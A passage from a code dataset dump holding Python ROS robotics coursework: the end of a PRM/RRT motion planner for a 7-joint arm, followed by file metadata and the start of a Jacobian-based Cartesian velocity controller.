\"q_goal\",q_goal\n strmap[str(numpy.asarray(q_start))]=numpy.asarray(q_start)\n strmap[str(numpy.asarray(q_goal))]=numpy.asarray(q_goal)\n\t adjmap[str(numpy.asarray(q_start))]=[]\n adjmap[str(numpy.asarray(q_goal))]=[]\n adjdistmap[str(numpy.asarray(q_start))]=[]\n adjdistmap[str(numpy.asarray(q_goal))]=[]\n\t starttime=time.time()\n currenttime=starttime\n prevpart2time=starttime\n\t #plot\n\t taxis=[]\n\t y=[]\n\t #fisrt check the start point, if it is on obstacle should restart it\n\t if(not self.is_state_valid(q_start)):\n\t print \"start point is on obstacle, please remove the obstacle and restart\"\n\t\tq_list=[]\n\t q_list.append(q_start)\n\t v_list,a_list,t = self.compute_simple_timing(q_list, 10) \n\t return q_list, v_list, a_list, t\n #part1--------------------------------------\n while (currenttime-starttime<T):\n\t\tprint \"currenttime-starttime\",currenttime-starttime\n\t\t#create random node\n\t randomNode=numpy.zeros(7)\n for i in range(0,7):\n\t\t randomNode[i]=q_min[i]+(q_max[i]-q_min[i])*random.random()\n\t\t#if this point is valid, then add to the roadmap\n\t\tif(self.is_state_valid(randomNode)):\n\t\t #print \"randomNode\",randomNode\n\t\t randomNode=numpy.asarray(randomNode)\n\t strmap[str(randomNode)]=randomNode\n\t\t adjmap[str(randomNode)]=[]\n\t\t adjdistmap[str(randomNode)]=[]\n\t\t for k in adjmap:\n\t\t\tif(k!=str(randomNode) and self.is_valid_segment(randomNode,strmap[k])): # if this randomnode could connect to the other point\n\t\t\t dist=numpy.linalg.norm(randomNode-strmap[k])\n\t\t adjmap[k].append(randomNode)\n\t\t\t adjdistmap[k].append(dist)\n\t\t\t adjmap[str(randomNode)].append(strmap[k])\n\t\t\t adjdistmap[str(randomNode)].append(dist)\n\t\t if (self.is_valid_segment(randomNode,q_start)): connectstart=True\n\t\t if (self.is_valid_segment(randomNode,q_goal)): connectgoal=True\n\t\t#print \"strmap\",strmap\n\t\t#print \"adjmap\",adjmap\n\t\t#print \"adjdistmap\",adjdistmap\n\t\t#part2---------------------------------------------------------------------------------\n\t\tcurrenttime=time.time()\n\t\tif (connectstart==True and connectgoal==True and (currenttime-prevpart2time)>=1):\n\t\t #every one second\n\t\t prevpart2time=time.time()\n\t\t visitmap={}\n\t\t disttostartmap={}\n\t\t prevnodemap={}\n\t\t #initilization\n\t\t for k in strmap:\n\t\t visitmap[k]=False\n\t\t\tdisttostartmap[k]=infinite\n\t\t\tprevnodemap[k]=\"\"\n\t\t disttostartmap[str(numpy.asarray(q_start))]=0.0\n\t\t arr=[] #content: point list (minimun heap)\n\t\t arr.append(str(numpy.asarray(q_start)))\n\t\t while(len(arr)!=0 and visitmap[str(numpy.asarray(q_goal))]==False):\n\t\t\t#print \"len arr\",len(arr)\n\t\t\t#print \"goal visted?\",visitmap[str(numpy.asarray(q_goal))]\n\t\t\tmindist=disttostartmap[arr[0]]\n\t\t\tmIndext=0\n\t\t\t#find the smallest unknown distance node\n\t\t\tfor i in range(0, len(arr)):\n\t\t\t tempdist=disttostartmap[arr[i]]\n\t\t\t if(tempdist <mindist):\n\t\t\t\tmindist=tempdist\n\t\t\t\tmIndex=i\n\t\t\tv=strmap[arr[mIndext]] #the node has smallest distance to start in the array\n\t\t\tvisitmap[str(v)]=True #mark visited\n\t\t\t#remove this item from the array\n\t\t\tarr.remove(str(v))\n\t\t\tadjlist=adjmap[str(v)] # get the adjacent list\n\t\t\t#print \"v:\",v\n\t\t\t#print \"adjlist\",adjlist\n\t\t\t#update the adjacent node distance to start point\n\t\t\t#print \"adjlist len\", len(adjlist)\n\t\t\tfor j in range(0,len(adjlist)):\n\t\t\t #print \"j\",j\n\t\t\t #if that node is unvisited\n\t\t\t w=adjlist[j]\n\t\t\t w=numpy.asarray(w)\n\t\t\t #print \"w\",w\n\t\t\t #print \"str w\",str(w)\n\t\t\t #print \"strmap \", strmap\n\t\t\t #print \"strmap w\", strmap[str(w)]\n\t\t\t #print \"visitmap[str(w)]\",visitmap[str(w)]\n\t\t\t if(not visitmap[str(w)]):\n\t\t\t\t#print \"w is not visted!\"\n\t\t\t\tolddist=disttostartmap[str(w)]\n\t\t\t\tnewdist=disttostartmap[str(v)]+numpy.linalg.norm(v-w)\n\t\t\t\tif(newdist<olddist):\n\t\t\t\t #update the distance to start point\n\t\t\t\t disttostartmap[str(w)]=newdist\n\t\t\t\t #update the parent node\n\t\t\t\t prevnodemap[str(w)]=str(v)\n\t\t\t #add the connected node to array\n\t\t\t #print \"w\",w\n\t\t\t #print \"arr\",arr\n\t\t\t if (not str(w) in arr):\n\t\t\t\t #print \"w is not in arr\"\n\t\t\t\t arr.append(str(w))\n\t\t\t\t #print \"after append\",arr\n\t\t #check whether there is a path from start to goal\n\t\t if(visitmap[str(numpy.asarray(q_goal))]==True): #there is path from start to goal\n\t\t\tprint \"there is a path from start to goal\"\n\t\t\tnewmindist=disttostartmap[str(numpy.asarray(q_goal))]\n\t\t\tprint \"newmindist\",newmindist\n\t\t\tif(newmindist<min_dist_from_start_goal): #update the path and the mindistance\n\t\t\t print \"update\"\n\t\t\t min_dist_from_start_goal=newmindist\n\t\t\t path=[]\n\t\t\t path.append(q_goal)\n\t\t\t prev=prevnodemap[str(numpy.asarray(q_goal))]\n #print \"prev\",prev\n\t\t\t while (prev != str(numpy.asarray(q_start))):\n\t\t\t\tpath.insert(0,strmap[prev])\n\t\t\t\t#print \"prev\",prev\n\t\t\t\tprev=prevnodemap[prev]\n\t\t\t #add the start point\n\t\t\t path.insert(0,q_start)\n\t\t\tprint \"path inside\", path\n\t\t#print \"path\",path\n\t\t#----------------------------------------------------------------------------------\n\t\tif(min_dist_from_start_goal<infinite):\n\t\t taxis.append(time.time()-starttime)\n\t\t y.append(min_dist_from_start_goal)\n\t\tcurrenttime=time.time()\n\t #----------------part1-timeout--------------------------\n\t print \"timeout\"\n\t print \"path final\",path\n\t if (min_dist_from_start_goal<infinite): #if min_dist_from_start_goal<infinite <infinite, there is a path from start to goal\n\t\t#plot \n\t\tfig=plt.figure()\n\t\tplt.plot(taxis,y,'r')\n\t\tplt.xlabel('time')\n\t\tplt.ylabel('shortest path')\n\t\t#plt.ion()\n\t\tplt.show()\n\t\t#time.sleep(5)\n\t\t#plt.close()\n\t else:\n\t\tprint \"PRM :there is no path\"\n\t\tq_list=[]\n\t q_list.append(q_start)\n\t v_list,a_list,t = self.compute_simple_timing(q_list, 10) #v=0, a=0, \n\t return q_list, v_list, a_list, t\n\telse:\t\t\t\t \n\t #RRT-------------------------------------------------------------------\n\t treeList=[] #store tree nodes\n\t prevIndex=[] # store parent nodes index\n\t treeList.append(q_start)\n\t prevIndex.append(-1)\n\t newNode=q_start\n\t count=0\n\t #check whether the start point is valid,if the start point is not valid, then there is not path from start to goal\n\t if (not self.is_state_valid(q_start)):\n\t count=2222\n\t while (not self.is_valid_segment(newNode,q_goal)):\n\t #print \"count\",count #test\n\t if count>2000:\n\t\t break\n\t #create random node\n\t randomNode=numpy.zeros(7)\n for i in range(0,7):\n\t\t randomNode[i]=q_min[i]+(q_max[i]-q_min[i])*random.random()\n\t #print randomNode\n\t #check the randomnode is valid or not\n\t if(self.is_state_valid(randomNode)):\n\t\t minindex=0\n\t\t mindist=numpy.linalg.norm(randomNode-treeList[0])\n\t\t #if vlaid, then find the closet node in the treelist to the random node\n\t\t for j in range(1,len(treeList)):\n\t\t dist=numpy.linalg.norm(randomNode-treeList[j])\n\t\t if(dist<mindist):\n\t\t\t mindist=dist\n\t\t\t minindex=j\n\t\t #create a intended instertnode(may not be inserted)\n\t\t insertNode=treeList[minindex]+0.5*(randomNode-treeList[minindex])/mindist\n\t\t #check this node could be inserted or not\n\t\t if (self.is_valid_segment(treeList[minindex],insertNode)):\n\t\t #if valid, insert the node to the tree, count+1, and update the newNode\n\t\t count=count+1\n\t\t print \"count:\",count\n\t\t print \"insertnode:\",insertNode\n\t\t treeList.append(insertNode)\n\t\t prevIndex.append(minindex)\n\t\t newNode=insertNode\n\t #if count> 2000: didn't find the path, the arm should not move\n\t print \"count\",count\n if count>2000:\n\t if count==2222:\n\t\t print \"the start point is not valid, please restart it\"\n\t q_list=[]\n\t q_list.append(q_start)\n\t v_list,a_list,t = self.compute_simple_timing(q_list, 10) #v=0, a=0, \n\t return q_list, v_list, a_list, t\n\t #if count<2000, find path from the RRT----------------------------------------------------------\n\t print \"treeList\",treeList\n\t print \"prevIndex\",prevIndex\n\t print \"q_start\",q_start\n\t print \"q_goal\",q_goal\n\t path=[]\n\t path.append(q_goal)\n\t prev=len(treeList)-1 #q_goal is the last element in treenode\n\t print \"prev\",prev \n\t while (prev != -1): # if prev=-1, it has get the q_start\n\t path.insert(0,treeList[prev]) #insert before the exist node in path\n\t prev=prevIndex[prev] \n\t print \"un-shortcut path:\",path\n\t print \"un-short cut path nodes:\",len(path)\n\t#shortcut the path-------------------------------------------------------------\n\tprint \"before shortcut path\",path\n\tshortcut_path=[]\n\tshortcut_path.append(q_start)\n\tcurrent=0 #index\n\tnext=1# index\n\twhile (current != (len(path)-1)):\n\t #find the farthest node that could conect to the current node\n\t for i in range(current+1, len(path)):\n\t\tif (self.is_valid_segment(path[current],path[i])):\n\t\t next=i\n\t shortcut_path.append(path[next])\n\t current=next\n\tprint \"shortcut path:\",shortcut_path\n\tprint \"short cut path nodes:\",len(shortcut_path)\n\t#resample-----------------------------------------------------------------------------\n\tresample_path=[]\n\tfor i in range(0,len(shortcut_path)-1):\n\t n1=shortcut_path[i]\n\t n2=shortcut_path[i+1]\n\t dist12=numpy.linalg.norm(n2-n1)\n\t num=int(round(dist12/0.5)) #make sure each segment<0.5(could do num+1)\n\t #num must >=1\n\t if num<1:\n\t\t#add the start point and go next, do not resample\n\t\tresample_path.append(shortcut_path[i])\n\t\tcontinue\n\t num=num+1\t\n\t vincrease=(n2-n1)/num #num>=1\n\t print \"vincrease\",numpy.linalg.norm(vincrease) # norm of vincrease should <0.5\n\t for j in range(0,num): #the point in shortcut_path[i+1] is not inserted in the ith loop\n\t\tresample_path.append(n1+j*vincrease)\n\tresample_path.append(q_goal)\n\tprint \"resample path:\",resample_path\n\tprint \"resample_path nodes:\",len(resample_path)\n\t#---------------------------------------------------------------------------------------- \n q_list = resample_path\n print \"q_list:\"\n print q_list\n # A provided convenience function creates the velocity and acceleration data, \n # assuming 0 velocity and acceleration at each intermediate point, and 10 seconds\n # for each trajectory segment.\n v_list,a_list,t = self.compute_simple_timing(q_list, 1)\n\t#calculate acceleration and velocity----------------------------------------------------\n\tnum=len(resample_path) #num of nodes on resample part\n\taT=[]\n\tvT=[]\n\tfor i in range(0,7):\n\t b=numpy.zeros(num)\n\t b[0]=3*(q_list[1][i]-q_list[0][i]) #q_list: n*7\n\t b[num-1]=-3*(q_list[num-1][i]-q_list[num-2][i])\n\t for k in range (1,num-1):\n\t\tb[j]=6*(q_list[k+1][i]+q_list[k-1][i]-2*q_list[k][i])\n\t mat=numpy.zeros((num,num))\n\t mat[0][0]=1\n\t mat[0][1]=0.5\n mat[num-1][num-2]=0.5\n\t mat[num-1][num-1]=1\n\t for j in range (1,num-1):\n\t\tmat[j][j-1]=1\n\t\tmat[j][j]=4\n\t\tmat[j][j+1]=1\n\t invmat=numpy.linalg.inv(mat)\n\t ai=numpy.dot(invmat,b) #n*1 for joint i\n\t aT.append(ai) #aT: 7*n\n\t #calculate vi\n\t vi=numpy.zeros(num)\n\t for m in range(1,num-1):\n\t\tvi[m]=(q_list[m+1][i]-q_list[m][i])-(2*ai[m]+ai[m+1])/6\n\t vT.append(vi) #vT: 7*N\n\ta_list=numpy.transpose(aT) # N*7\n\tv_list=numpy.transpose(vT) # N*7\t\n print \" v_list:\",v_list\n print \" a_list:\",a_list\n print \"t:\"\n print t\n #v_list,a_list,t = self.compute_simple_timing(q_list, 1)\n return q_list, v_list, a_list, t\n # ---------------------------------------------------------------\n\n def project_plan(self, q_start, q_goal, q_min, q_max):\n q_list, v_list, a_list, t = self.motion_plan(q_start, q_goal, q_min, q_max)\n joint_trajectory = self.create_trajectory(q_list, v_list, a_list, t)\n return joint_trajectory\n\n def moveit_plan(self, q_start, q_goal, q_min, q_max):\n self.group.clear_pose_targets()\n self.group.set_joint_value_target(q_goal)\n plan=self.group.plan()\n joint_trajectory = plan.joint_trajectory\n for i in range(0,len(joint_trajectory.points)):\n joint_trajectory.points[i].time_from_start = \\\n rospy.Duration(joint_trajectory.points[i].time_from_start)\n return joint_trajectory \n\n def create_trajectory(self, q_list, v_list, a_list, t):\n joint_trajectory = trajectory_msgs.msg.JointTrajectory()\n for i in range(0, len(q_list)):\n point = trajectory_msgs.msg.JointTrajectoryPoint()\n point.positions = list(q_list[i])\n point.velocities = list(v_list[i])\n point.accelerations = list(a_list[i])\n point.time_from_start = rospy.Duration(t[i])\n joint_trajectory.points.append(point)\n joint_trajectory.joint_names = self.joint_names\n return joint_trajectory\n\n def execute(self, joint_trajectory):\n goal = control_msgs.msg.FollowJointTrajectoryGoal()\n goal.trajectory = joint_trajectory\n goal.goal_time_tolerance = rospy.Duration(0.0)\n self.trajectory_client.send_goal(goal)\n self.trajectory_client.wait_for_result()\n\n def move_arm_cb(self, feedback):\n print 'Moving the arm'\n self.mutex.acquire()\n q_start = self.q_current\n T = convert_from_message(feedback.pose)\n print \"Solving IK\"\n q_goal = self.IK(T)\n if len(q_goal)==0:\n print \"IK failed, aborting\"\n self.mutex.release()\n return\n\n print \"IK solved, planning\"\n q_start = numpy.array(self.q_from_joint_state(self.joint_state))\n trajectory = self.project_plan(q_start, q_goal, self.q_min, self.q_max)\n if not trajectory.points:\n print \"Motion plan failed, aborting\"\n else:\n print \"Trajectory received with \" + str(len(trajectory.points)) + \" points\"\n self.execute(trajectory)\n self.mutex.release()\n\n def no_obs_cb(self, feedback):\n print 'Removing all obstacles'\n self.scene.remove_world_object(\"obs1\")\n self.scene.remove_world_object(\"obs2\")\n self.scene.remove_world_object(\"obs3\")\n self.scene.remove_world_object(\"obs4\")\n\n def simple_obs_cb(self, feedback):\n print 'Adding simple obstacle'\n self.no_obs_cb(feedback)\n pose_stamped = geometry_msgs.msg.PoseStamped()\n pose_stamped.header.frame_id = \"base\"\n pose_stamped.header.stamp = rospy.Time(0)\n\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.5, 0.5, 0)) )\n self.scene.add_box(\"obs1\", pose_stamped,(0.1,0.1,1))\n\n def complex_obs_cb(self, feedback):\n print 'Adding hard obstacle'\n self.no_obs_cb(feedback)\n pose_stamped = geometry_msgs.msg.PoseStamped()\n pose_stamped.header.frame_id = \"base\"\n pose_stamped.header.stamp = rospy.Time(0)\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.7, 0.5, 0.2)) )\n self.scene.add_box(\"obs1\", pose_stamped,(0.1,0.1,0.8))\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.7, 0.25, 0.6)) )\n self.scene.add_box(\"obs2\", pose_stamped,(0.1,0.5,0.1))\n\n def super_obs_cb(self, feedback):\n print 'Adding super hard obstacle'\n self.no_obs_cb(feedback)\n pose_stamped = geometry_msgs.msg.PoseStamped()\n pose_stamped.header.frame_id = \"base\"\n pose_stamped.header.stamp = rospy.Time(0)\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.7, 0.5, 0.2)) )\n self.scene.add_box(\"obs1\", pose_stamped,(0.1,0.1,0.8))\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.7, 0.25, 0.6)) )\n self.scene.add_box(\"obs2\", pose_stamped,(0.1,0.5,0.1))\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.7, 0.0, 0.2)) )\n self.scene.add_box(\"obs3\", pose_stamped,(0.1,0.1,0.8))\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.7, 0.25, 0.1)) )\n self.scene.add_box(\"obs4\", pose_stamped,(0.1,0.5,0.1))\n\n def subsample_cb(self, feedback):\n handle = feedback.menu_entry_id\n state = self.menu_handler.getCheckState( handle )\n if state == MenuHandler.CHECKED: \n self.subsample_trajectory = False\n self.spline_timing = False\n print \"Subsample OFF / Spline timing OFF\"\n self.menu_handler.setCheckState( handle, MenuHandler.UNCHECKED )\n self.menu_handler.setCheckState( self.spline_entry, MenuHandler.UNCHECKED )\n else:\n self.subsample_trajectory = True\n print \"Subsample ON\"\n self.menu_handler.setCheckState( handle, MenuHandler.CHECKED )\n self.menu_handler.reApply(self.server)\n self.server.applyChanges()\n\n def spline_cb(self, feedback):\n handle = feedback.menu_entry_id\n state = self.menu_handler.getCheckState( handle )\n if state == MenuHandler.CHECKED: \n self.spline_timing = False\n print \"Spline timing OFF\" \n self.menu_handler.setCheckState( handle, MenuHandler.UNCHECKED )\n else:\n if not self.subsample_trajectory:\n print \"Spline timing only works with subsampled trajectory\"\n else:\n self.spline_timing = True\n print \"Spline timing ON\"\n self.menu_handler.setCheckState( handle, MenuHandler.CHECKED )\n self.menu_handler.reApply(self.server)\n self.server.applyChanges()\n \n def joint_states_callback(self, joint_state):\n self.mutex.acquire()\n self.q_current = joint_state.position\n self.joint_state = joint_state\n self.mutex.release()\n\n def init_marker(self):\n\n self.server = InteractiveMarkerServer(\"control_markers\")\n\n control_marker = InteractiveMarker()\n control_marker.header.frame_id = \"/base\"\n control_marker.name = \"move_arm_marker\"\n\n move_control = InteractiveMarkerControl()\n move_control.name = \"move_x\"\n move_control.orientation.w = 1\n move_control.orientation.x = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"move_y\"\n move_control.orientation.w = 1\n move_control.orientation.y = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"move_z\"\n move_control.orientation.w = 1\n move_control.orientation.z = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_x\"\n move_control.orientation.w = 1\n move_control.orientation.x = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_y\"\n move_control.orientation.w = 1\n move_control.orientation.z = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_z\"\n move_control.orientation.w = 1\n move_control.orientation.y = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n\n menu_control = InteractiveMarkerControl()\n menu_control.interaction_mode = InteractiveMarkerControl.BUTTON\n menu_control.always_visible = True\n box = Marker() \n box.type = Marker.CUBE\n box.scale.x = 0.15\n box.scale.y = 0.03\n box.scale.z = 0.03\n box.color.r = 0.5\n box.color.g = 0.5\n box.color.b = 0.5\n box.color.a = 1.0\n menu_control.markers.append(box)\n box2 = deepcopy(box)\n box2.scale.x = 0.03\n box2.scale.z = 0.1\n box2.pose.position.z=0.05\n menu_control.markers.append(box2)\n control_marker.controls.append(menu_control)\n\n control_marker.scale = 0.25 \n self.server.insert(control_marker, self.control_marker_feedback)\n\n self.menu_handler = MenuHandler()\n self.menu_handler.insert(\"Move Arm\", callback=self.move_arm_cb)\n obs_entry = self.menu_handler.insert(\"Obstacles\")\n self.menu_handler.insert(\"No Obstacle\", callback=self.no_obs_cb, parent=obs_entry)\n self.menu_handler.insert(\"Simple Obstacle\", callback=self.simple_obs_cb, parent=obs_entry)\n self.menu_handler.insert(\"Hard Obstacle\", callback=self.complex_obs_cb, parent=obs_entry)\n self.menu_handler.insert(\"Super-hard Obstacle\", callback=self.super_obs_cb, parent=obs_entry)\n options_entry = self.menu_handler.insert(\"Options\")\n self.subsample_entry = self.menu_handler.insert(\"Subsample\", parent=options_entry, \n callback=self.subsample_cb)\n self.menu_handler.setCheckState(self.subsample_entry, MenuHandler.CHECKED)\n self.spline_entry = self.menu_handler.insert(\"Spline timing\", parent=options_entry,\n callback = self.spline_cb)\n self.menu_handler.setCheckState(self.spline_entry, MenuHandler.CHECKED)\n self.menu_handler.apply(self.server, \"move_arm_marker\",)\n\n self.server.applyChanges()\n\n Ttrans = tf.transformations.translation_matrix((0.6,0.2,0.2))\n Rtrans = tf.transformations.rotation_matrix(3.14159,(1,0,0))\n self.server.setPose(\"move_arm_marker\", convert_to_message(numpy.dot(Ttrans,Rtrans)))\n self.server.applyChanges()\n\n\nif __name__ == '__main__':\n moveit_commander.roscpp_initialize(sys.argv)\n rospy.init_node('move_arm', anonymous=True)\n ma = MoveArm()\n rospy.spin()\n\n"
},
{
"alpha_fraction": 0.5808379054069519,
"alphanum_fraction": 0.5954452157020569,
"avg_line_length": 40.03814697265625,
"blob_id": "fedbb301d2c415b9606396187690d8fb7529418a",
"content_id": "f6c8c68cbbd5d30f12230199268383700a0ebb43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15061,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 367,
"path": "/cartesian control /cartesian_control-3.py",
"repo_name": "MengyuWu/robotics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport math\nimport numpy\nfrom threading import Thread, Lock\n\nimport geometry_msgs.msg\nfrom interactive_markers.interactive_marker_server import *\nimport rospy\nfrom sensor_msgs.msg import JointState\nimport tf\nfrom urdf_parser_py.urdf import URDF\nfrom visualization_msgs.msg import InteractiveMarkerControl\nfrom visualization_msgs.msg import Marker\n\n# Set this to True if you are doing the extra credit part of the homework,\n# and are tracking both end-effector translation and rotation.\nsixdof = True\n\n# This is the function that must be filled in as part of Homework 2.\n# For a description of the expected code, and detailed information on the\n# function parameters, see the class handout for Lecture 8.\ndef cartesian_control(joint_transforms, \n q_current, q0_desired,\n b_T_ee_current, b_T_ee_desired):\n num_joints = len(joint_transforms)\n dq = numpy.zeros(num_joints)\n #-------------------- Fill in your code here ----version2----------------------\n c_T_b=numpy.linalg.inv(b_T_ee_current) \n current_T_desired=numpy.dot(c_T_b, b_T_ee_desired)\n #print current_T_desired\n DisX=current_T_desired[0:3,3] #translation part\n print \"Disx1:\",DisX\n #method 2 to calculate DisX\n DisX2=b_T_ee_desired[0:3,3]-b_T_ee_current[0:3,3]\n print \"Disx2:\",DisX2\n p=0.4 #0.3\n ee_v_ee=p*DisX #3*1 should use DisX\n #----------------------scale velocity 0.1m/s\n vnorm=numpy.linalg.norm(ee_v_ee)\n print \"vnrom\",vnorm\n if vnorm >0.1:\n\tee_v_ee=ee_v_ee/vnorm*0.1\n #---------------------------------part3-W-----------------------------\n current_R_des=current_T_desired[0:3,0:3]\n angle, axis = rotation_from_matrix(current_R_des)\n #print angle\n #print axis\n p2=0.3\n W=p2*angle*axis\n Wnorm=numpy.linalg.norm(W)\n print \"Wnrom\",Wnorm\n #---------------------------scale W<1 rad/s\n if Wnorm>1:\n\tW=W/Wnorm\n print \"W\",W\n ee_v_ee=numpy.concatenate((ee_v_ee,W)) #6*1\n print \"ee_v_ee:\",ee_v_ee\n J=numpy.zeros((6,num_joints))\n for j in range(0,num_joints): #j from 0 to n-1\n\t#Vj=numpy.zeros((6,num_joints));\n\tb_T_j=joint_transforms[j]\n\tj_T_b=numpy.linalg.inv(b_T_j)\n\tb_T_ee=joint_transforms[num_joints-1]\n\t#b_T_ee=b_T_ee[1]------------------------\n\tj_T_ee=numpy.dot(j_T_b,b_T_ee)\n\tee_T_j=numpy.linalg.inv(j_T_ee)\n\t#calculate Vj component\n\tee_R_j=ee_T_j[0:3,0:3]\n\tj_trans_ee=j_T_ee[0:3,3]\n\tS_j_t_ee=numpy.array([[0,-j_trans_ee[2],j_trans_ee[1]],[j_trans_ee[2],0,-j_trans_ee[0]],[-j_trans_ee[1],j_trans_ee[0],0]])\n\tup_right_Vj=numpy.dot(-ee_R_j,S_j_t_ee)\n #print j_trans_ee\n\t#concatenate small matrixs into large one\n\tVj_upper=numpy.concatenate((ee_R_j,up_right_Vj),axis=1)\n\tVj_down=numpy.concatenate((numpy.zeros((3,3)),ee_R_j),axis=1)\n\tVj=numpy.concatenate((Vj_upper,Vj_down)) #Vj:6*6\n #assgin J[:,j]\n\tJ[:,j]=Vj[:,5]\n #get J upper: \n #print J\n J_upper=J[0:3,:]\n J_upper_pinv=numpy.linalg.pinv(J_upper,1.0e-2)\n #J-pinv\n Jpinv=numpy.linalg.pinv(J,1.0e-2)\n #calculate qdot\n qdot_des=numpy.dot(Jpinv,ee_v_ee)\n dq=qdot_des\n #part 2:\n qdotsec=numpy.zeros(num_joints)\n p1=0.6 #propotion for qdotsec\n q_current0=q_current[0]\n print \"q_current[0]:\",q_current[0]\n print \"q0_desired:\",q0_desired\n qdotsec[0]=p1*(q0_desired-q_current0)\n I=numpy.identity(num_joints)\n N=I-numpy.dot(numpy.linalg.pinv(J),J) #???????????????????????\n #N=I-numpy.dot(Jpinv,J)\n qdotnull=numpy.dot(N,qdotsec)\n dq=dq+qdotnull\n #scale------------------------------1rad/s\n dqnorm=numpy.linalg.norm(dq)\n print \"dqnorm\",dqnorm\n if dqnorm >1:\n\tdq=dq/dqnorm\n print \"qdotnull:\",qdotnull\n print \"J*qdotnull\",numpy.dot(J,qdotnull)\n dqnorm=numpy.linalg.norm(dq)\n print \"dqnorm-after-scale\",dqnorm\n print \"dq:\",dq\n #----------------------------------------------------------------------\n return dq\n \ndef convert_to_message(T):\n t = geometry_msgs.msg.Pose()\n position = tf.transformations.translation_from_matrix(T)\n orientation = tf.transformations.quaternion_from_matrix(T)\n t.position.x = position[0]\n t.position.y = position[1]\n t.position.z = position[2]\n t.orientation.x = orientation[0]\n t.orientation.y = orientation[1]\n t.orientation.z = orientation[2]\n t.orientation.w = orientation[3] \n return t\n\n# Returns the angle-axis representation of the rotation contained in the input matrix\n# Use like this:\n# angle, axis = rotation_from_matrix(R)\ndef rotation_from_matrix(matrix):\n R = numpy.array(matrix, dtype=numpy.float64, copy=False)\n R33 = R[:3, :3]\n # axis: unit eigenvector of R33 corresponding to eigenvalue of 1\n l, W = numpy.linalg.eig(R33.T)\n i = numpy.where(abs(numpy.real(l) - 1.0) < 1e-8)[0]\n if not len(i):\n raise ValueError(\"no unit eigenvector corresponding to eigenvalue 1\")\n axis = numpy.real(W[:, i[-1]]).squeeze()\n # point: unit eigenvector of R33 corresponding to eigenvalue of 1\n l, Q = numpy.linalg.eig(R)\n i = numpy.where(abs(numpy.real(l) - 1.0) < 1e-8)[0]\n if not len(i):\n raise ValueError(\"no unit eigenvector corresponding to eigenvalue 1\")\n # rotation angle depending on axis\n cosa = (numpy.trace(R33) - 1.0) / 2.0\n if abs(axis[2]) > 1e-8:\n sina = (R[1, 0] + (cosa-1.0)*axis[0]*axis[1]) / axis[2]\n elif abs(axis[1]) > 1e-8:\n sina = (R[0, 2] + (cosa-1.0)*axis[0]*axis[2]) / axis[1]\n else:\n sina = (R[2, 1] + (cosa-1.0)*axis[1]*axis[2]) / axis[0]\n angle = math.atan2(sina, cosa)\n return angle, axis\n\nclass CartesianControl(object):\n\n #Initialization\n def __init__(self):\n #Loads the robot model, which contains the robot's kinematics information\n self.robot = URDF.from_parameter_server()\n\n #Subscribes to information about what the current joint values are.\n rospy.Subscriber(\"joint_states\", JointState, self.callback)\n\n # Publishes desired joint velocities\n self.pub_vel = rospy.Publisher(\"/joint_velocities\", JointState, queue_size=1)\n\n #This is where we hold the most recent joint transforms\n self.joint_transforms = []\n self.x_current = tf.transformations.identity_matrix()\n\n #Create \"Interactive Marker\" that we can manipulate in RViz\n self.init_marker()\n self.ee_tracking = 0\n self.red_tracking = 0\n self.q_current = []\n\n self.x_target = tf.transformations.identity_matrix()\n self.q0_desired = 0\n\n self.mutex = Lock()\n \n self.timer = rospy.Timer(rospy.Duration(0.1), self.timer_callback)\n\n def init_marker(self):\n\n self.server = InteractiveMarkerServer(\"control_markers\")\n\n control_marker = InteractiveMarker()\n control_marker.header.frame_id = \"/world_link\"\n control_marker.name = \"cc_marker\"\n\n move_control = InteractiveMarkerControl()\n move_control.name = \"move_x\"\n move_control.orientation.w = 1\n move_control.orientation.x = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"move_y\"\n move_control.orientation.w = 1\n move_control.orientation.y = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"move_z\"\n move_control.orientation.w = 1\n move_control.orientation.z = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_x\"\n move_control.orientation.w = 1\n move_control.orientation.x = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_y\"\n move_control.orientation.w = 1\n move_control.orientation.z = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_z\"\n move_control.orientation.w = 1\n move_control.orientation.y = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n\n control_marker.scale = 0.25\n self.server.insert(control_marker, self.control_marker_feedback)\n\n redundancy_marker = InteractiveMarker()\n redundancy_marker.header.frame_id = 